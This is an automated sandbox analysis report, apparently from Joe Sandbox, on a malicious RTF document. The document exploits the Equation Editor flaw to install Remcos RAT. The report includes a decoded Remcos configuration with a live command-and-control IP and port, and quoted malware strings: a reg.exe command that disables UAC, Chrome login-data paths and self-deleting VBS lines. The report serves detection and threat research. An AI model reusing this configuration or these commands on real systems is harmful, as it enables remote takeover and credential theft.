Edit tour

Windows Analysis Report
WC5Gv13cOQ.rtf

Overview

General Information

Sample name:	WC5Gv13cOQ.rtf renamed because original name is a hash value
Original sample name:	904af9fb7e5bee74577f430af1080585.rtf
Analysis ID:	1532435
MD5:	904af9fb7e5bee74577f430af1080585
SHA1:	71b79e6f053b89985d109d81670f2dce172775ae
SHA256:	98bcb2a98c5347e4409349f1605a7883a40a541cffc4aa62bf7c77b5160cdd20
Tags:	rtf
Infos:

Detection

Remcos

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Contains functionality to bypass UAC (CMSTPLUA)

Detected Remcos RAT

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Drops script at startup location

Sigma detected: EQNEDT32.EXE connecting to internet

Sigma detected: File Dropped By EQNEDT32EXE

Sigma detected: Remcos

Suricata IDS alerts for network traffic

System process connects to network (likely due to code injection or exploit)

Yara detected Remcos RAT

Yara detected UAC Bypass using CMSTP

Binary is likely a compiled AutoIt script file

C2 URLs / IPs found in malware configuration

Contains functionality to inject code into remote processes

Contains functionality to register a low level keyboard hook

Contains functionality to steal Chrome passwords or cookies

Contains functionality to steal Firefox passwords or cookies

Contains functionalty to change the wallpaper

Delayed program exit found

Document exploit detected (process start blacklist hit)

Drops VBS files to the startup folder

Machine Learning detection for dropped file

Maps a DLL or memory area into another process

Office equation editor drops PE file

Office equation editor establishes network connection

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Searches for Windows Mail specific files

Shellcode detected

Sigma detected: Equation Editor Network Connection

Sigma detected: Suspicious Binary In User Directory Spawned From Office Application

Sigma detected: Suspicious Microsoft Office Child Process

Sigma detected: WScript or CScript Dropper

Switches to a custom stack to bypass stack traces

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Instant Messenger accounts or passwords

Tries to steal Mail credentials (via file / registry access)

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Writes to foreign memory regions

Yara detected WebBrowserPassView password recovery tool

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Contains functionality for read data from the clipboard

Contains functionality to block mouse and keyboard input (often used to hinder debugging)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to communicate with device drivers

Contains functionality to download and execute PE files

Contains functionality to download and launch executables

Contains functionality to dynamically determine API calls

Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)

Contains functionality to enumerate running services

Contains functionality to execute programs as a different user

Contains functionality to launch a control a shell (cmd.exe)

Contains functionality to launch a process as a different user

Contains functionality to launch a program with higher privileges

Contains functionality to modify clipboard data

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Contains functionality to simulate keystroke presses

Contains functionality to simulate mouse events

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Creates a start menu entry (Start Menu\Programs\Startup)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Downloads executable code via HTTP

Dropped file seen in connection with other malware

Drops PE files

Enables debug privileges

Extensive use of GetProcAddress (often used to hide API calls)

Found WSH timer for Javascript or VBS script (likely evasive script)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found decision node followed by non-executed suspicious APIs

Found evasive API chain (date check)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

OS version to string mapping found (often used in BOTs)

Office Equation Editor has been started

Potential document exploit detected (performs DNS queries)

Potential document exploit detected (performs HTTP gets)

Potential document exploit detected (unknown TCP traffic)

Potential key logger detected (key state polling based)

Queries the volume information (name, serial number etc) of a device

Sigma detected: Uncommon Svchost Parent Process

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Stores files to the Windows start menu directory

Suricata IDS alerts with low severity for network traffic

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Keylogger Generic

Yara signature match

Classification

Process Tree

System is w7x64

WINWORD.EXE (PID: 3304 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)

EQNEDT32.EXE (PID: 3384 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)

taskhostw.exe (PID: 3540 cmdline: "C:\Users\user\AppData\Roaming\taskhostw.exe" MD5: 6539C2C942C9AA3AB9C7FE14FCCF0B4E)

name.exe (PID: 3580 cmdline: "C:\Users\user\AppData\Roaming\taskhostw.exe" MD5: 6539C2C942C9AA3AB9C7FE14FCCF0B4E)

svchost.exe (PID: 3592 cmdline: "C:\Users\user\AppData\Roaming\taskhostw.exe" MD5: 54A47F6B5E09A77E61649109C6A08866)

svchost.exe (PID: 3704 cmdline: C:\Windows\SysWOW64\svchost.exe /stext "C:\Users\user\AppData\Local\Temp\siqmroydgnmmmfpuczimwafbeumewarjhx" MD5: 54A47F6B5E09A77E61649109C6A08866)

svchost.exe (PID: 3712 cmdline: C:\Windows\SysWOW64\svchost.exe /stext "C:\Users\user\AppData\Local\Temp\ckvxrh" MD5: 54A47F6B5E09A77E61649109C6A08866)

svchost.exe (PID: 3724 cmdline: C:\Windows\SysWOW64\svchost.exe /stext "C:\Users\user\AppData\Local\Temp\feapszuyi" MD5: 54A47F6B5E09A77E61649109C6A08866)

EQNEDT32.EXE (PID: 3920 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)

wscript.exe (PID: 3820 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs" MD5: 045451FA238A75305CC26AC982472367)

name.exe (PID: 3856 cmdline: "C:\Users\user\AppData\Local\directory\name.exe" MD5: 6539C2C942C9AA3AB9C7FE14FCCF0B4E)

svchost.exe (PID: 3892 cmdline: "C:\Users\user\AppData\Local\directory\name.exe" MD5: 54A47F6B5E09A77E61649109C6A08866)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Remcos, RemcosRAT	Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.	APT33 The Gorgon Group UAC-0050	http://malware-traffic-analysis.net/2017/12/22/index.html https://0xmrmagnezi.github.io/malware%20analysis/RemcosRAT/ https://asec.ahnlab.com/en/32376/ https://asec.ahnlab.com/ko/25837/ https://asec.ahnlab.com/ko/32101/	https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

Malware Configuration

Threatname: Remcos

{"Version": "5.1.3 Pro", "Host:Port:Password": "107.173.4.16:2404", "Assigned name": "newest", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-FI789R", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
WC5Gv13cOQ.rtf	INDICATOR_RTF_MalVer_Objects	Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.	ditekSHen	0x1c61:$obj2: \objdata 0x1c7e:$obj3: \objupdate 0x1c3a:$obj5: \objautlink

Memory Dumps

Source	Rule	Description	Author	Strings
0000000E.00000002.394468723.0000000000400000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
0000000E.00000002.394468723.0000000000400000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
0000000E.00000002.394468723.0000000000400000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
0000000E.00000002.394468723.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x6c4b8:$a1: Remcos restarted by watchdog! 0x6ca30:$a3: %02i:%02i:%02i:%03i
0000000E.00000002.394468723.0000000000400000.00000040.80000000.00040000.00000000.sdmp	REMCOS_RAT_variants	unknown	unknown	0x6650c:$str_a1: C:\Windows\System32\cmd.exe 0x66488:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x66488:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x66988:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x671b8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x6657c:$str_b2: Executing file: 0x675fc:$str_b3: GetDirectListeningPort 0x66fa8:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x67128:$str_b7: \update.vbs 0x665a4:$str_b9: Downloaded file: 0x66590:$str_b10: Downloading file: 0x66634:$str_b12: Failed to upload file: 0x675c4:$str_b13: StartForward 0x675e4:$str_b14: StopForward 0x67080:$str_b15: fso.DeleteFile " 0x67014:$str_b16: On Error Resume Next 0x670b0:$str_b17: fso.DeleteFolder " 0x66624:$str_b18: Uploaded file: 0x665e4:$str_b19: Unable to delete: 0x67048:$str_b20: while fso.FileExists(" 0x66ac1:$str_c0: [Firefox StoredLogins not found]
0000000E.00000002.394468723.0000000000400000.00000040.80000000.00040000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x663f8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x6638c:$s1: CoGetObject 0x663a0:$s1: CoGetObject 0x663bc:$s1: CoGetObject 0x7035e:$s1: CoGetObject 0x6634c:$s2: Elevation:Administrator!new:
0000000E.00000002.394502954.0000000000794000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
00000007.00000002.854766910.0000000000234000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
00000007.00000002.854880979.0000000000400000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
00000007.00000002.854880979.0000000000400000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
00000007.00000002.854880979.0000000000400000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
00000007.00000002.854880979.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x6c4b8:$a1: Remcos restarted by watchdog! 0x6ca30:$a3: %02i:%02i:%02i:%03i
00000007.00000002.854880979.0000000000400000.00000040.80000000.00040000.00000000.sdmp	REMCOS_RAT_variants	unknown	unknown	0x6650c:$str_a1: C:\Windows\System32\cmd.exe 0x66488:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x66488:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x66988:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x671b8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x6657c:$str_b2: Executing file: 0x675fc:$str_b3: GetDirectListeningPort 0x66fa8:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x67128:$str_b7: \update.vbs 0x665a4:$str_b9: Downloaded file: 0x66590:$str_b10: Downloading file: 0x66634:$str_b12: Failed to upload file: 0x675c4:$str_b13: StartForward 0x675e4:$str_b14: StopForward 0x67080:$str_b15: fso.DeleteFile " 0x67014:$str_b16: On Error Resume Next 0x670b0:$str_b17: fso.DeleteFolder " 0x66624:$str_b18: Uploaded file: 0x665e4:$str_b19: Unable to delete: 0x67048:$str_b20: while fso.FileExists(" 0x66ac1:$str_c0: [Firefox StoredLogins not found]
00000007.00000002.854880979.0000000000400000.00000040.80000000.00040000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x663f8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x6638c:$s1: CoGetObject 0x663a0:$s1: CoGetObject 0x663bc:$s1: CoGetObject 0x7035e:$s1: CoGetObject 0x6634c:$s2: Elevation:Administrator!new:
00000006.00000002.365614526.0000000000D70000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
00000006.00000002.365614526.0000000000D70000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
00000006.00000002.365614526.0000000000D70000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
00000006.00000002.365614526.0000000000D70000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x6aab8:$a1: Remcos restarted by watchdog! 0x6b030:$a3: %02i:%02i:%02i:%03i
00000006.00000002.365614526.0000000000D70000.00000004.00001000.00020000.00000000.sdmp	REMCOS_RAT_variants	unknown	unknown	0x64b0c:$str_a1: C:\Windows\System32\cmd.exe 0x64a88:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x64a88:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x64f88:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x657b8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x64b7c:$str_b2: Executing file: 0x65bfc:$str_b3: GetDirectListeningPort 0x655a8:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x65728:$str_b7: \update.vbs 0x64ba4:$str_b9: Downloaded file: 0x64b90:$str_b10: Downloading file: 0x64c34:$str_b12: Failed to upload file: 0x65bc4:$str_b13: StartForward 0x65be4:$str_b14: StopForward 0x65680:$str_b15: fso.DeleteFile " 0x65614:$str_b16: On Error Resume Next 0x656b0:$str_b17: fso.DeleteFolder " 0x64c24:$str_b18: Uploaded file: 0x64be4:$str_b19: Unable to delete: 0x65648:$str_b20: while fso.FileExists(" 0x650c1:$str_c0: [Firefox StoredLogins not found]
00000006.00000002.365614526.0000000000D70000.00000004.00001000.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x649f8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x6498c:$s1: CoGetObject 0x649a0:$s1: CoGetObject 0x649bc:$s1: CoGetObject 0x6e95e:$s1: CoGetObject 0x6494c:$s2: Elevation:Administrator!new:
0000000D.00000002.394764051.00000000028E0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
0000000D.00000002.394764051.00000000028E0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
0000000D.00000002.394764051.00000000028E0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
0000000D.00000002.394764051.00000000028E0000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x6aab8:$a1: Remcos restarted by watchdog! 0x6b030:$a3: %02i:%02i:%02i:%03i
0000000D.00000002.394764051.00000000028E0000.00000004.00001000.00020000.00000000.sdmp	REMCOS_RAT_variants	unknown	unknown	0x64b0c:$str_a1: C:\Windows\System32\cmd.exe 0x64a88:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x64a88:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x64f88:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x657b8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x64b7c:$str_b2: Executing file: 0x65bfc:$str_b3: GetDirectListeningPort 0x655a8:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x65728:$str_b7: \update.vbs 0x64ba4:$str_b9: Downloaded file: 0x64b90:$str_b10: Downloading file: 0x64c34:$str_b12: Failed to upload file: 0x65bc4:$str_b13: StartForward 0x65be4:$str_b14: StopForward 0x65680:$str_b15: fso.DeleteFile " 0x65614:$str_b16: On Error Resume Next 0x656b0:$str_b17: fso.DeleteFolder " 0x64c24:$str_b18: Uploaded file: 0x64be4:$str_b19: Unable to delete: 0x65648:$str_b20: while fso.FileExists(" 0x650c1:$str_c0: [Firefox StoredLogins not found]
0000000D.00000002.394764051.00000000028E0000.00000004.00001000.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x649f8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x6498c:$s1: CoGetObject 0x649a0:$s1: CoGetObject 0x649bc:$s1: CoGetObject 0x6e95e:$s1: CoGetObject 0x6494c:$s2: Elevation:Administrator!new:
Process Memory Space: name.exe PID: 3580	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
Process Memory Space: name.exe PID: 3580	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
Process Memory Space: name.exe PID: 3580	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
Process Memory Space: name.exe PID: 3580	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x11ef64:$a1: Remcos restarted by watchdog! 0x11f4be:$a3: %02i:%02i:%02i:%03i 0x11f8ed:$a3: %02i:%02i:%02i:%03i
Process Memory Space: svchost.exe PID: 3592	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
Process Memory Space: svchost.exe PID: 3592	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
Process Memory Space: svchost.exe PID: 3592	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
Process Memory Space: svchost.exe PID: 3592	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
Process Memory Space: svchost.exe PID: 3592	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x47b7c:$a1: Remcos restarted by watchdog! 0x480d6:$a3: %02i:%02i:%02i:%03i 0x48505:$a3: %02i:%02i:%02i:%03i
Process Memory Space: svchost.exe PID: 3704	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
Process Memory Space: name.exe PID: 3856	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
Process Memory Space: name.exe PID: 3856	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
Process Memory Space: name.exe PID: 3856	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
Process Memory Space: name.exe PID: 3856	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x147ebe:$a1: Remcos restarted by watchdog! 0x148418:$a3: %02i:%02i:%02i:%03i 0x148847:$a3: %02i:%02i:%02i:%03i
Process Memory Space: svchost.exe PID: 3892	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
Process Memory Space: svchost.exe PID: 3892	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
Process Memory Space: svchost.exe PID: 3892	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
Process Memory Space: svchost.exe PID: 3892	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x8739:$a1: Remcos restarted by watchdog! 0x8c93:$a3: %02i:%02i:%02i:%03i 0x90c2:$a3: %02i:%02i:%02i:%03i
Click to see the 39 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
14.2.svchost.exe.400000.0.raw.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
14.2.svchost.exe.400000.0.raw.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
14.2.svchost.exe.400000.0.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
14.2.svchost.exe.400000.0.raw.unpack	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x6c4b8:$a1: Remcos restarted by watchdog! 0x6ca30:$a3: %02i:%02i:%02i:%03i
14.2.svchost.exe.400000.0.raw.unpack	REMCOS_RAT_variants	unknown	unknown	0x6650c:$str_a1: C:\Windows\System32\cmd.exe 0x66488:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x66488:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x66988:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x671b8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x6657c:$str_b2: Executing file: 0x675fc:$str_b3: GetDirectListeningPort 0x66fa8:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x67128:$str_b7: \update.vbs 0x665a4:$str_b9: Downloaded file: 0x66590:$str_b10: Downloading file: 0x66634:$str_b12: Failed to upload file: 0x675c4:$str_b13: StartForward 0x675e4:$str_b14: StopForward 0x67080:$str_b15: fso.DeleteFile " 0x67014:$str_b16: On Error Resume Next 0x670b0:$str_b17: fso.DeleteFolder " 0x66624:$str_b18: Uploaded file: 0x665e4:$str_b19: Unable to delete: 0x67048:$str_b20: while fso.FileExists(" 0x66ac1:$str_c0: [Firefox StoredLogins not found]
14.2.svchost.exe.400000.0.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x663f8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x6638c:$s1: CoGetObject 0x663a0:$s1: CoGetObject 0x663bc:$s1: CoGetObject 0x7035e:$s1: CoGetObject 0x6634c:$s2: Elevation:Administrator!new:
14.2.svchost.exe.400000.0.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
14.2.svchost.exe.400000.0.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
14.2.svchost.exe.400000.0.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
14.2.svchost.exe.400000.0.unpack	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x6aab8:$a1: Remcos restarted by watchdog! 0x6b030:$a3: %02i:%02i:%02i:%03i
14.2.svchost.exe.400000.0.unpack	REMCOS_RAT_variants	unknown	unknown	0x64b0c:$str_a1: C:\Windows\System32\cmd.exe 0x64a88:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x64a88:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x64f88:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x657b8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x64b7c:$str_b2: Executing file: 0x65bfc:$str_b3: GetDirectListeningPort 0x655a8:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x65728:$str_b7: \update.vbs 0x64ba4:$str_b9: Downloaded file: 0x64b90:$str_b10: Downloading file: 0x64c34:$str_b12: Failed to upload file: 0x65bc4:$str_b13: StartForward 0x65be4:$str_b14: StopForward 0x65680:$str_b15: fso.DeleteFile " 0x65614:$str_b16: On Error Resume Next 0x656b0:$str_b17: fso.DeleteFolder " 0x64c24:$str_b18: Uploaded file: 0x64be4:$str_b19: Unable to delete: 0x65648:$str_b20: while fso.FileExists(" 0x650c1:$str_c0: [Firefox StoredLogins not found]
14.2.svchost.exe.400000.0.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x649f8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x6498c:$s1: CoGetObject 0x649a0:$s1: CoGetObject 0x649bc:$s1: CoGetObject 0x6e95e:$s1: CoGetObject 0x6494c:$s2: Elevation:Administrator!new:
6.2.name.exe.d70000.0.raw.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
6.2.name.exe.d70000.0.raw.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
6.2.name.exe.d70000.0.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
6.2.name.exe.d70000.0.raw.unpack	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x6aab8:$a1: Remcos restarted by watchdog! 0x6b030:$a3: %02i:%02i:%02i:%03i
6.2.name.exe.d70000.0.raw.unpack	REMCOS_RAT_variants	unknown	unknown	0x64b0c:$str_a1: C:\Windows\System32\cmd.exe 0x64a88:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x64a88:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x64f88:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x657b8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x64b7c:$str_b2: Executing file: 0x65bfc:$str_b3: GetDirectListeningPort 0x655a8:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x65728:$str_b7: \update.vbs 0x64ba4:$str_b9: Downloaded file: 0x64b90:$str_b10: Downloading file: 0x64c34:$str_b12: Failed to upload file: 0x65bc4:$str_b13: StartForward 0x65be4:$str_b14: StopForward 0x65680:$str_b15: fso.DeleteFile " 0x65614:$str_b16: On Error Resume Next 0x656b0:$str_b17: fso.DeleteFolder " 0x64c24:$str_b18: Uploaded file: 0x64be4:$str_b19: Unable to delete: 0x65648:$str_b20: while fso.FileExists(" 0x650c1:$str_c0: [Firefox StoredLogins not found]
6.2.name.exe.d70000.0.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x649f8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x6498c:$s1: CoGetObject 0x649a0:$s1: CoGetObject 0x649bc:$s1: CoGetObject 0x6e95e:$s1: CoGetObject 0x6494c:$s2: Elevation:Administrator!new:
6.2.name.exe.d70000.0.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
6.2.name.exe.d70000.0.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
6.2.name.exe.d70000.0.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
6.2.name.exe.d70000.0.unpack	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x690b8:$a1: Remcos restarted by watchdog! 0x69630:$a3: %02i:%02i:%02i:%03i
